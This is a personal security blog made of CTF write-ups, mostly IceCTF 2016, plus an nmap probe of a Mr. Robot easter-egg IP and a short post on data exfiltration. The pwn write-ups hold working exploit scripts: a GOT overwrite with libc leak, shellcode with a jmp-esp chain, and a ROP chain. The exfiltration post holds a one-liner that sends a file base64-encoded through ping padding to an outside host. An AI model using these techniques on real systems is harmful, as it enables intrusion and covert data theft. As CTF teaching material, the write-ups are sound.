       `##;#++
       #:';`+:
      ;'`:;:+;
      #``:;:+#
      # `+;':#
      #: ;'';#
      #.`.;+`:
      ';::;'#
       #.:'#'
        #+#;    o shit whaddup!
sh

it's

a

secret

All I can really say to that is oh shit, whaddup?

Nice. The important thing here is that meme id + 8 is the meme dankness. Before, there was no way to set the meme dankness (located right before the content pointer) to something that is 4 bytes in length. Now secret_meme fills it with 0x69696969, eliminating the null bytes between the meme id and the meme content pointer.

Pointer Overwrite

Loading the binary up in gdb I was able to test this overwrite theory. My plan of attack was:

  1. Set a breakpoint at 0x08048898 to check the stack after each operation.
  2. Set the meme id to a string of length 8 to stop it from writing a null byte into the meme id buffer. It actually goes into the meme dankness, but I control that as well so it does not matter.
  3. Run the secret_meme function to set the dankness to 0x69696969
  4. Run the update id function providing 0xc bytes of junk data and then the pointer (0x41414141 for now)

Success!

Overcoming a null byte

Unfortunately the last byte of the id buffer was set to null and there was no way to unset it. This is where I got clever: what if I could make strlen always return a number high enough to allow the overwrite? Searching ROP gadgets in radare2 turned up one:

0x08048567                 91  xchg eax, ecx
0x08048568               0408  add al, 8
0x0804856a               01c9  add ecx, ecx
0x0804856c               f3c3  ret

To make sure this would be okay I examined the contents of EAX and ECX when strlen is called in main:

eax            0xffffda88       0xffffda88
ecx            0x11             0x11

EAX is a temporary register and will hold the length of the string returned by strlen and ECX just always seems to be 0x11 when this call is made. Furthermore, playing around with the value of ECX for after the function call resulted in no crashes, so this seemed like a good solution.
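To double check what the gadget hands back in place of a real strlen result, here is a small sketch that applies the three instructions to the register values observed above. The function name strlen_gadget is made up for this example, and it only models the 32-bit arithmetic, not flags or memory.

```python
MASK32 = 0xFFFFFFFF


def strlen_gadget(eax, ecx):
    """Model xchg eax, ecx; add al, 8; add ecx, ecx on 32-bit values."""
    eax, ecx = ecx, eax                 # xchg eax, ecx
    al = ((eax & 0xFF) + 8) & 0xFF      # add al, 8 only touches the low byte
    eax = (eax & 0xFFFFFF00) | al
    ecx = (ecx + ecx) & MASK32          # add ecx, ecx
    return eax, ecx


# Register values seen at the call to strlen in main.
eax, ecx = strlen_gadget(0xFFFFDA88, 0x11)
print(hex(eax), hex(ecx))
```

With ECX at 0x11 on entry, the fake strlen returns 0x19, which is more than the 0x10 bytes (0xc of junk plus the 4-byte pointer) needed to reach the content pointer.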

To cause the overwrite I had to set the pointer (previously set to 0x41414141 above) to the address of got.strlen, change the dankness to 5 to allow 4 bytes of overwrite (fgets accounts for the null), and then write to the address of the meme content.

I decided to use pwntools for this:

from pwn import *

e = ELF('./dat-boinary')
r = process(e.path)

strlen_replace = 0x08048567
gdb.attach(r, "b * 0x0804889d")
sleep(3)

r.sendline(cyclic(8))
log.info("buffer maxed out")

r.sendline("5")
log.info("called secret meme")

r.sendline("1")
r.sendline(cyclic(0xc) + p32(e.sym['got.strlen']) + cyclic(10))
log.info("meme content should be addr of strlen")

r.sendline("2")
r.sendline("5")
log.info("set dankness to 5")

r.sendline("3")
r.sendline(p32(strlen_replace))
log.info("strlen replaced")

r.sendline("1")
r.sendline(cyclic(100))

Running this and stepping through each command sent showed that the GOT entry for strlen was overwritten with the address of the gadget:

> x/x &'strlen@got.plt'
0x8049120 <strlen@got.plt>:     0x08048567

Trying to set the meme id again (with cyclic(100)) caused another overwrite:

> x/8x $esp
0xffb136a0:     0xffb13cc9      0x0000002f      0x61616161      0x00616162
0xffb136b0:     0x61616163      0x61616164      0x61616165      0x00000000

So now I was able to write anything anywhere repeatedly.

Leaking Puts

Because ASLR was enabled for this challenge I needed to leak an address of a libc function before I could call system to get a shell. Leaking puts seemed like an obvious choice. This would be done with the help of the print meme content option. All I needed to do was point the meme content at the GOT entry for puts, print it, and then capture the first four bytes. Those first four bytes are the little-endian address of puts inside of libc. To calculate the address of system all I had to do was use pwntools to rebase the libc binary and then reference system from the libc binary symbols. All of this is accomplished with the following python snippet:

r.sendline("1")
r.sendline(cyclic(0xc) + p32(e.sym['got.puts']) + cyclic(10))
log.info("meme is now the address of puts")
r.recvrepeat(1)

r.sendline("4")
r.recvuntil("c0nT3nT:")
r.recv(1) #tab
leaked_puts = u32(r.recv(4))

libc.address = leaked_puts - libc.symbols["puts"]
r.recv(1024)
log.success("leaked puts: " + hex(leaked_puts) + ", system: " + hex(libc.symbols['system']))

The resulting output is promising:

[*] meme is now the address of puts
[+] leaked puts: 0xf75a37e0, system: 0xf757e310

Checking this in the debugger confirmed that this was working correctly:

> p system
$1 = {<text variable, no debug info>} 0xf757e310 <system>
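The rebasing that pwntools does here is just subtraction and addition. The sketch below reproduces the local numbers from the output above. The two offsets are placeholders, not taken from the real libc: I picked them so the arithmetic lands on the addresses shown. In a real run they come from the symbol table of the libc in use.

```python
# Placeholder offsets of puts and system inside libc (assumed values).
PUTS_OFFSET = 0x657E0
SYSTEM_OFFSET = 0x40310


def rebase(leaked_puts, puts_offset, system_offset):
    """Return (libc base, runtime address of system) from a puts leak."""
    base = leaked_puts - puts_offset
    return base, base + system_offset


base, system_addr = rebase(0xF75A37E0, PUTS_OFFSET, SYSTEM_OFFSET)
print("base:", hex(base), "system:", hex(system_addr))
```

A quick sanity check on any leak is that the computed base is page aligned, meaning its low 12 bits are zero.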

I was ready to get the flag!

Flag Captured

Since the meme id was being read in using fread and not fgets I was able to put a null terminated /bin/sh string right at the beginning of the meme id while still being able to set the GOT entry for strlen to the leaked system address. I chose strlen here because it is run on command and has the meme id buffer as its only argument. I followed the following steps to make this work:

  1. Set the meme id to [/bin/sh\x00][0xc-8 bytes junk][address of strlen GOT entry][10 bytes extra to satisfy the read]
  2. Set the meme dankness back to 5 in order to overwrite the meme content
  3. Overwrite the strlen GOT entry with the leaked and calculated system address
  4. Set the meme id to trigger system instead of strlen with /bin/sh in the buffer passed as an argument
  5. Get the flag :)

The full code for the end of this exploit can be seen at the bottom of this post. Running the script on the remote host resulted in the flag!

→ python boinary.py REMOTE
[*] '/home/vagrant/CTF/ctfx/dat-boinary'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[*] '/home/vagrant/CTF/ctfx/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to problems.ctfx.io on port 1337: Done
[*] buffer maxed out
[*] called secret meme
[*] meme content should be addr of strlen
[*] set dankness to 5
[*] strlen replaced
[*] meme is now the address of puts
[+] leaked puts: 0xf75f4da0, system: 0xf75ce3e0
[*] set meme to strlen
[*] set dankness to 5
[*] set strlen to system
[*] trying shell
[+] got shell
[+] Flag: ctf(0n1y_th3_fr35h35t_m3m3s)

Gottem: ctf(0n1y_th3_fr35h35t_m3m3s)

Full script

IceCTF 2016 - So Close

Challenge description

Yet so far :( /home/so_close on the shell.

Jumping right in, I checked the binary's security with checksec and loaded it up in radare2. No NX and a call to read over stack data... sounds like a simple stack-based buffer overflow.

The buffer that is read into is of size 0x118 - 0x10 = 264 bytes. Since I'm lazy I used strace to figure out the number of bytes it was reading:

→ strace ./so_close 1000
execve("./so_close", ["./so_close", "1000"], [/* 29 vars */]) = 0
[ Process PID=20494 runs in 32 bit mode. ]
brk(0)                                  = 0x93a6000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7746000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=50645, ...}) = 0
mmap2(NULL, 50645, PROT_READ, MAP_PRIVATE, 3, 0) = 0xfffffffff7739000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0P\234\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1754876, ...}) = 0
mmap2(NULL, 1763964, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xfffffffff758a000
mprotect(0xf7732000, 4096, PROT_NONE)   = 0
mmap2(0xf7733000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a8000) = 0xfffffffff7733000
mmap2(0xf7736000, 10876, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7736000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7589000
set_thread_area(0xffe6f130)             = 0
mprotect(0xf7733000, 8192, PROT_READ)   = 0
mprotect(0xf7769000, 4096, PROT_READ)   = 0
munmap(0xf7739000, 50645)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 7), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7745000
write(1, "something something something..\n", 32something something something..
) = 32
read(0, "", 272)                        = 0
exit_group(0)                           = ?
+++ exited with 0 +++

Looks like 272 bytes. So 272 over a 264 byte buffer means an 8 byte overflow. That doesn't sound like a lot, so I loaded it up in gdb and passed in a cyclic pattern:

So I control EIP and what ESP points to, which are one right after the other in the buffer. Looking at the contents of ECX shows that it is the start of the input buffer. If there was some way to jump to ECX then I could execute shellcode, since NX was disabled. After a bit of tinkering, my solution ended up being to find a jmp esp, and assemble jmp ecx where ESP was pointing. I assumed ASLR was enabled, but it should not matter in this case.

The steps I needed to take are as follows:

  1. Find a jmp esp in the binary
  2. Assemble jmp ecx and figure out its length so I know how to craft the exploit buffer
  3. Craft an exploit buffer
  4. ????
  5. Profit :)

To find a jmp esp all I needed to do was use the assembly opcode search feature of radare2:

/c jmp esp
0x0804859f   # 2: jmp esp

Score. Next, assembling jmp ecx was done with the asm function of pwntools:

python -c 'from pwn import *; print(len(asm("jmp ecx")))'
2

Then, crafting an exploit buffer... I needed the buffer to look something like this:

[shellcode][asm(jmp ecx)*2][jmp esp][asm(jmp ecx)*2][jmp esp][asm(jmp ecx)*2][jmp esp]...

[asm(jmp ecx)*2][jmp esp] would need to repeat until the end of the buffer to cause the overflow to happen. With this in mind I began to experiment in gdb to eventually get a shell:

A little recap of what happened in that last video:

  • The length of the shellcode generated by pwntools was 22 bytes
  • The total buffer length needed to be 268 to overflow properly
  • 268-22 is the needed length minus the shellcode length
  • ("iiii" + "jjjj") was multiplied by ((268-22)/8) because that is the length required after the shellcode divided by the 8 byte length of the pair. However, extra padding (the "aaaaaa") needed to be added because 268-22 is 246, which divided by 8 is 30 with a remainder of 6. That remainder needs to be filled in order to make the buffer long enough to trigger the bug
  • "iiii" was replaced with asm("jmp ecx")*2 because it was the contents of where esp was pointing. It was multiplied by 2 to fit our test with "iiii" and "jjjj" because it is two bytes in length when assembled (*2 is the 4 bytes needed).
  • "jjjj" was replaced with 0x0804859f because that is the address of the jmp esp we found above. "jjjj" was only a placeholder for our test. The real address is needed so that the program executes the jmp ecx we assembled earlier: esp points to our assembled jmp ecx, so jumping to esp runs it.
  • Remember that our shellcode is located at the beginning of the buffer, and ecx points to the beginning of the buffer. So jumping to ecx executes the shellcode.
  • ;cat was added to the end of the python command to keep stdin open. This is a common trick for exploitation problems. Check here for a bit of detail
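The length arithmetic from the recap can be sketched without pwntools. This is only an illustration of the layout: the 22 NOP bytes stand in for the real shellcode, and the jmp ecx bytes (ff e1) are hard-coded here rather than assembled.

```python
import struct

JMP_ECX = b"\xff\xe1"        # machine code for jmp ecx (2 bytes)
JMP_ESP_ADDR = 0x0804859F    # address of the jmp esp found with radare2
TOTAL_LEN = 268              # buffer length needed to overflow properly


def build_payload(shellcode):
    """Shellcode first, then repeated [jmp ecx * 2][jmp esp address]
    pairs, then filler bytes for whatever remainder is left."""
    unit = JMP_ECX * 2 + struct.pack("<I", JMP_ESP_ADDR)   # 8 bytes
    room = TOTAL_LEN - len(shellcode)
    repeats, remainder = divmod(room, len(unit))
    return shellcode + unit * repeats + b"a" * remainder


payload = build_payload(b"\x90" * 22)   # placeholder for the shellcode
print(len(payload), divmod(TOTAL_LEN - 22, 8))
```

Using divmod keeps the repeat count and the filler length in sync if the shellcode length changes.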

Running this on the binary on the server gave the following:

(python -c 'from pwn import *; print asm(shellcraft.i386.linux.sh()) + (asm("jmp ecx")*2 + p32(0x0804859f))*((268-22)/8) + "aaaaaa"'; cat) | /home/so_close/so_close
something something something..
cat /home/so_close/flag.txt
IceCTF{eeeeeeee_bbbbbbbbb_pppppppp_woooooo}

Flag: IceCTF{eeeeeeee_bbbbbbbbb_pppppppp_woooooo}

IceCTF 2016 - ROPi

Challenge description:

Ritorno orientata programmazione nc ropi.vuln.icec.tf 6500

The binary provided with the challenge was an x86 ELF. I started by reversing it with radare2: Feel free to stop the video above to look at the functions! The main function just calls ezy, which reads 0x40 bytes on top of a buffer that is 0x28 bytes in size. This means that we are running 0x18 bytes over the buffer. The first 4 bytes after those 0x28 overwrite the saved EBP and then the next 4 overwrite EIP. To test this theory we load up the binary in gdb and put in 0x28 bytes, plus BBBB to overwrite EBP, then iiii to overwrite EIP:


Ok so we have program control. Nice! Now what? Since the program is called ROPi I started looking for things to jump to. I actually spent a lot of time trying to find gadgets to write an actual ROP chain. I was stumped for a bit and asked Chris Eagle for some advice because he had solved the challenge for Samurai earlier in the week. He pointed out that there are uncalled functions. If you look in the r2 video above, you can see there are three functions right after ezy in the function list (afl): ret, ori, and pro. After disassembling and reversing them it was clear what the intended solution was: The ret (0x8048569) function calls open("./flag.txt", 0), the ori (0x80485c4) function calls read(dati, 0x80, fd) where fd is the file descriptor opened by open previously and dati is the buffer to read to, and pro (0x804862c) calls printf("%s", dati). So the proper solution is to use return oriented programming to call all of these functions in order. There is one trick, however. If you look closely at ret and ori you will see that there is a condition that needs to be met in order for the functions to not hard exit. For ret, ebp-8 must be 0xbadbeeef and for ori, either ebp-8 must equal 0xabcdefff or ebp-0xc must equal 0x78563412. To start I just tried calling ret then ori so I needed to set up my buffer as follows:

[0x2c bytes padding][address of ret][address of ori][0xbadbeeef][0xabcdefff]

My attempt in gdb: It looks like ret and ori were successfully called! Since this will call ret, then ori, there is no place to put the address of pro to call because of the condition that needs to be met in ret (0xbadbeeef). To solve this, I can actually re-use the ezy function to read in the buffer again. With this in mind I tried setting up my buffer as follows:

[0x2c bytes padding][address of ret][address of ezy][0xbadbeeef][newline][cyclic(100)]

The reason for the cyclic pattern is to figure out at what offset I needed to overflow in ezy the second time in order to regain EIP control. This is shown below:

Looks like I need to write 51 bytes after calling ezy again and then I can overwrite the return. So the final buffer should look as follows:

[0x2c bytes padding][address of ret][address of ezy][0xbadbeeef][newline][51 bytes of padding][address of ori][address of ezy][0xabcdefff][newline][51 bytes of padding][address of pro]

I wrote a quick pwntools script to do just this:

from pwn import *
context.log_level = 'error'
e = ELF("./ropi")

print(cyclic(0x2c) + p32(e.symbols['ret']) + p32(e.symbols['ezy']) + p32(0xbadbeeef))
print(cyclic(51) + p32(e.symbols['ori']) + p32(e.symbols['ezy']) + p32(0xabcdefff))
print(cyclic(51) + p32(e.symbols['pro']))

→ python ropi.py | nc ropi.vuln.icec.tf 6500
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] aperto
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] leggi
Benvenuti al convegno RetOri Pro!
Vuole lasciare un messaggio?
[+] stampare
IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}

Flag obtained: IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}

IceCTF 2016 - Blue Monday

Challenge Description:

Those who came before me lived through their vocations From the past until completion, they'll turn away no more And still I find it so hard to say what I need to say But I'm quite sure that you'll tell me just how I should feel today.

A file download was given for this challenge. Running file yielded the following result:

→ file blue_monday.mid
blue_monday.mid: Standard MIDI data (format 1) using 1 track at 1/220

Assuming it actually was MIDI, I opened it up in audacity with no luck. It was just a bunch of constant tones. This was at about 2:30AM so as a last effort before bed I just catted the file:

→ cat blue_monday.mid
MThdTrkId\Icd\ced\eCd\CTd\TFd\F{d\{Hd\HAd\Acd\ckd\k1d\1nd\n9d\9_d\_md\mUd\U5d\5Id\Icd\c_d\_Wd\W1d\17d\7hd\h_d\_md\mId\IDd\D1d\15d\5_d\_Ld\L3d\3td\t5d\5_d\_Hd\H4d\4vd\vEd\E_d\_ad\a_d\_rd\r4d\4vd\v3d\3}d\}h/

The point of interest here for me was that it looked like the beginning was spelling IceCTF{ but with extra characters in between. I loaded it up into ipython and ended up with this snippet to solve it:

with open("blue_monday.mid") as f:
    print(''.join([i for i in f.read() if ord(i)<127 and ord(i)>0x10 and i!='\\' and i !='d'])[7:][:-2][::2])

Basically this just removes any character that is non-ascii, a backslash, or d, and then cuts off the first 7 characters (the header) and the last 2, and then takes every other character. They had just embedded the flag into a working MIDI file it seems. Anyway, when you run this it prints the flag: IceCTF{HAck1n9_mU5Ic_W17h_mID15_L3t5_H4vE_a_r4v3}
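A different way to pull the characters out, working only from the printable dump shown above, is to notice that each flag character appears as the character, then d\, then the same character again. The sketch below is an alternative to the one-liner, not the snippet I actually used. The function name extract_flag_chars is made up, and the sample string is just the start of the cat output.

```python
import re


def extract_flag_chars(text):
    """Collect every character X that appears as X, 'd', backslash, X."""
    return "".join(m.group(1) for m in re.finditer(r"(.)d\\\1", text))


# First few groups from the cat output of blue_monday.mid.
sample = "Id\\Icd\\ced\\eCd\\CTd\\TFd\\F{d\\{"
print(extract_flag_chars(sample))
```

Matching on the repeated character avoids having to guess how many header and trailer bytes to slice off.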

IceCTF 2016 - Thor is a hacker now

Challenge description:

Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is?

The text file provided is just a hexdump produced with xxd. xxd actually has a feature to reverse a hexdump back into the original file. From there I identified the resulting file's format with the file command. It was an lzip. Extracting the lzip resulted in the following image:

thor

Flag:

IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}

Commands that were run in order:

→ xxd -r thor.txt > thor.bin
→ file thor.bin
thor.bin: lzip compressed data, version: 1
→ lzip -d thor.bin
→ file thor.bin.out
thor.bin.out: JPEG image data, JFIF standard 1.01
→ mv thor.bin.out thor.jpg

IceCTF 2016 - A Strong Feeling

Challenge description:

Do you think you could defeat this password checker for us? It's making me real pissed off! /home/a_strong_feeling/ on the shell or download it here

I started by loading the bin into radare2 and once I realized how big the main function was I just tried running it with input.

It looks like the sentence returned is different the more characters we get right and the same if we get the same number wrong. I had the idea to write a python script with pwntools that ran the binary over and over until a different sentence was produced:

from pwn import *
import string
charset = string.ascii_letters + string.digits + "{}_#"
context.log_level = 'error'

flag = "I"
b = ELF("./strong_feeling")

p = process(b.path)
p.sendline(flag)
out = p.recvall()

while flag[-1] != '}':
    for c in charset:
        p = process(b.path)
        p.sendline(flag+c)
        newout = p.recvall()
        if newout != out:
            out = newout
            flag += c
            print(flag)
            break  # restart the charset for the next position

The results were quite satisfying:

Flag acquired

IceCTF{pip_install_angr}

And yes I realize now that this could have just been solved with angr, but this was a cool way to do it too!
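The same idea can be tried without the binary. In the sketch below a fake checker stands in for the real program. It assumes, as observed above, that the output only changes when one more leading character is correct. The names make_checker and recover are made up for this example.

```python
import string

CHARSET = string.ascii_letters + string.digits + "{}_#"


def make_checker(secret):
    """Fake password checker: its output depends only on how many
    leading characters of the guess are correct (an assumption)."""
    def check(guess):
        correct = 0
        for a, b in zip(guess, secret):
            if a != b:
                break
            correct += 1
        return "sentence number %d" % correct
    return check


def recover(check, known="I"):
    """Extend `known` one character at a time until '}' is reached."""
    flag, out = known, check(known)
    while not flag.endswith("}"):
        for c in CHARSET:
            new_out = check(flag + c)
            if new_out != out:          # output changed: c is correct
                flag, out = flag + c, new_out
                break
        else:
            raise ValueError("no character changed the output")
    return flag


print(recover(make_checker("IceCTF{pip_install_angr}")))
```

Each position costs at most one run per character in the charset, so the whole flag takes a few hundred runs instead of an impossible brute force.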

IceCTF 2016 - Corrupt Transmission

Challenge description:

We intercepted this image, but it must have gotten corrupted during the transmission. Can you try and fix it?

For this challenge a file with the extension .png was provided. A common CTF challenge is to corrupt some part of an image, so the solution is to fix it! I started with the header. According to Wikipedia the file header is supposed to start with 89 50 4E 47 0D 0A 1A 0A. Looking at the file using xxd we can see that this png does not start with those bytes:

→ xxd corrupt_orig.png | head -1
00000000: 9050 4e47 0e1a 0a1b 0000 000d 4948 4452  .PNG........IHDR

The first byte and bytes 5-8 are wrong. To fix, I opened the image up in hexedit and changed the bytes to their correct values. Opening the file provided a valid image:

flag

And of course, the flag: IceCTF{t1s_but_4_5cr4tch}
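The same header fix can be scripted instead of done by hand in hexedit. This is a minimal sketch that works on the 16 bytes from the xxd output above. The function names are made up, and a real run would read and rewrite the whole file.

```python
PNG_MAGIC = bytes.fromhex("89504e470d0a1a0a")


def wrong_offsets(data):
    """Return the offsets in the first 8 bytes that differ from the magic."""
    return [i for i, (a, b) in enumerate(zip(data, PNG_MAGIC)) if a != b]


def fix_png_header(data):
    """Replace the first 8 bytes with the correct PNG signature."""
    return PNG_MAGIC + data[len(PNG_MAGIC):]


# First line of the xxd dump of corrupt_orig.png.
corrupt = bytes.fromhex("90504e470e1a0a1b0000000d49484452")
print(wrong_offsets(corrupt))
print(fix_png_header(corrupt).hex())
```

Offsets are zero-based here, so offset 0 is the first byte and offsets 4 through 7 are bytes 5-8.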

IceCTF 2016 - Vape Nation

Challenge description:

Go Green!

They provide a png called vape_nation.png:

vape nation

With the hint I figured it must be a green filter of some sort so I loaded up Stegsolve and checked out the green plane filters. Green plane 0 resulted in the following:

solved nation

Looks like a flag :)

IceCTF{420_CuR35_c4NCEr}

IceCTF 2016 - Demo

Challenge description:

I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell.

The source for this challenge was provided:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <libgen.h>
#include <string.h>

void give_shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

int main(int argc, char *argv[]) {
    if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
        give_shell();
    }
    else {
        printf("I'm sorry, your free trial has ended.\n");
    }
    return 0;
}

So to get the flag we need to make the _ shell variable equal icesh. The _ shell variable in bash is always set to the program name of the command being run. So I decided to use a different shell to see what would happen.

sh
ls icesh; /home/demo/demo
cat flag.txt
IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

And there we have our flag: IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
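The underlying problem is that _ is just an environment variable, so whoever launches the program decides what it contains. The sketch below is not how I solved the challenge. It only shows a parent process handing a child an arbitrary value for _. The helper name child_underscore and the /tmp/icesh path are made up.

```python
import os
import subprocess
import sys


def child_underscore(value):
    """Start a child Python process with `_` set to `value` and return
    what the child sees in its environment."""
    env = dict(os.environ, _=value)
    result = subprocess.run(
        [sys.executable, "-c", "import os; print(os.environ.get('_', ''))"],
        env=env, capture_output=True, text=True, check=True)
    return result.stdout.strip()


seen = child_underscore("/tmp/icesh")
# Same comparison the C code makes with basename() and strncmp().
print(seen, os.path.basename(seen) == "icesh")
```

Any check that relies on the environment, or on argv for that matter, can be satisfied this way by the caller.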

Mr. Robot Season 2 Episode 4 Easter Egg

After seeing the last Mr. Robot easter egg from season 2 episode 1 I have been on the lookout for IPs and domains to try and go after. At the end of season 2 episode 4 (init_1.asec) Elliot logs into an IRC server and the IP address is clearly visible as 192.251.68.253.

I decided to scan that host with nmap and got the following results:

→ sudo nmap -sS -Pn -sV -n 192.251.68.253
Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-28 08:46 EDT
Nmap scan report for 192.251.68.253
Host is up (0.023s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp?
80/tcp   open  http-proxy  F5 BIG-IP load balancer http proxy
554/tcp  open  rtsp?
7070/tcp open  realserver?
Service Info: Device: load balancer

HTTP up, cool. I went to the site and it was a fake IRC server with the hostname irc.colo-solutions.net.

After it logged me in as D0loresH4ze I was dropped in a channel called #th3g3ntl3man with the all too familiar samsepi0l (for the uninformed, Sam Sepiol was the alias Elliot used in season one to gain access to Steel Mountain, a secure datacenter).

After poking around and trying to get samsepi0l to say something besides "i don't have time for this right now." I played the role of Darlene and entered what she said in the show.

Here is the response I got:

they have changed their standard issue. we have a way in.

What does that even mean? At the end of the episode this line of dialogue was not shown. Only wait for my instructions was. The scene after shows a news article from Business Insider titled FBI gives up Blackberry for Android. I assume that is their "standard issue" and he is going to hack into them via their smartphones. That's a bold move, we'll see how it plays out next week.

After this I investigated a couple of other addresses I found (192.251.68.240, 104.97.14.93, 192.251.68.249, irc.eversible.co) but none of them turned up anything. I looked at the page source too, hoping to find something hidden in the javascript or HTML. Nothing there either... I guess we will just have to wait and see where this goes! I'll probably take a closer look at this after work, but I thought this would be cool to share now.

Data Exfiltration with Ping

I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it: how to exfiltrate data from a network using the padding of ICMP echo request packets.

Sending data

base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done

This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into ping.
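Here is a rough Python model of what the pipeline produces and how the receiving side would undo it. It is only a sketch: the function names are made up, and unlike the base64 command line tool it does not wrap the encoded text into lines, so the exact chunks differ slightly from the shell version.

```python
import base64


def to_ping_patterns(data, chunk=16):
    """Base64 encode `data` and return hex strings of up to 16 bytes
    each, the form that ping's -p option expects."""
    encoded = base64.b64encode(data)
    return [encoded[i:i + chunk].hex() for i in range(0, len(encoded), chunk)]


def from_ping_patterns(patterns):
    """Reverse the encoding: join the chunks and base64 decode them."""
    return base64.b64decode(b"".join(bytes.fromhex(p) for p in patterns))


secret = b"attack at dawn, bring snacks"
patterns = to_ping_patterns(secret)
for p in patterns:
    print("ping -c1 -s32 -p", p, "8.8.8.8")
print(from_ping_patterns(patterns))
```

Each pattern is at most 32 hex characters, which is the 16-byte limit of the -p option.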

Obviously you should change the IP before sending :)

Receiving data

You can grab the data off the wire using scapy. Here's a short little script that takes an out file name as the first argument and then an optional interface name to listen on as the second argument.

That's all for now.

Hello World

Finally finished this new blog. It's all static now so that's good.

I was on wordpress before and it was terrible. Hopefully I can put some cool stuff here!
